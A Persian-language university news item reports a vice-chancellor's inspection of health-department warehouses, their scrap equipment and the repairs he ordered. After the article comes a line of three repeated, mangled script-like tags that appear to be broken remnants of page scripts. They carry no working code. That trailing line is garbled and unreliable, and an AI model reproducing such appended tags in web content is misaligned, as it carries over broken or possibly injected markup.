در انبارهای معاونت بهداشتی انجام شد:

بازدید معاون توسعه مدیریت و منابع دانشگاه از انبارهای جاده شورین و علاقمندیان
مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه از انبارهای معاونت بهداشتی در جاده شورین و علاقمندیان بازدید کرد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، مهندس بهروز رحیمی معاون توسعه مدیریت و منابع به همراهی آقایانی مدیر امور رفاهی و پشتیبانی، دکتر نیاستی مدیر برنامه ریزی، بودجه و عملکرد و دیگر کارشناسان دانشگاه از انبارهای معاونت بهداشتی در جاده شورین و علاقمندیان بازدید کرد.

در این بازدید ضمن ارزیابی از اجناس و کالاهای مستعمل و اسقاط از جمله ماشین الات و تجهیزات کامپیوتری، از موجودی منابع و مصارف راکد نیز بازبینی به عمل آمد.

در پایان معاون توسعه مدیریت و منابع دانشگاه در راستای بهسازی و تعمیرات برخی از قسمت های انبارهای مذکور دستوراتی صادر کرد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>